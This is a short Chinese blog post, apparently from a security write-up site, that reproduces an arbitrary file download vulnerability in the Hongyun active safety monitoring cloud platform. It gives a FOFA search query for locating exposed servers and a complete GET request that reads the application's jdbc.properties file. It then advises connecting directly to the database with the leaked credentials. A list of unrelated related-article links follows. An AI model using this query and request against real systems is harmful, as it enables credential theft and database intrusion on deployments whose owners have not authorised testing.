漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

五:漏洞利用

读取到数据库账号密码,直接连接

相关推荐
Rverdoser20 分钟前
Linux环境开启MongoDB的安全认证
linux·安全·mongodb
速盾cdn1 小时前
速盾:CDN缓存的工作原理是什么?
网络·安全·web安全
亚信安全官方账号1 小时前
亚信安全发布《2024年第三季度网络安全威胁报告》
网络安全
IPFoxy6661 小时前
跨境出海安全:如何防止PayPal账户被风控?
安全
龙信科技1 小时前
【电子物证培训】龙信助力三明市公安局电子物证取证竞赛
安全
zhd15306915625ff2 小时前
库卡机器人维护需要注意哪些事项
安全·机器人·自动化
网络安全-杰克2 小时前
网络安全概论
网络·web安全·php
安全二次方security²2 小时前
ARM CCA机密计算安全模型之概述
安全·安全模型·cca·机密计算·领域管理扩展·arm-v9·平台安全服务
黑客Ela3 小时前
网络安全中常用浏览器插件、拓展
网络·安全·web安全·网络安全·php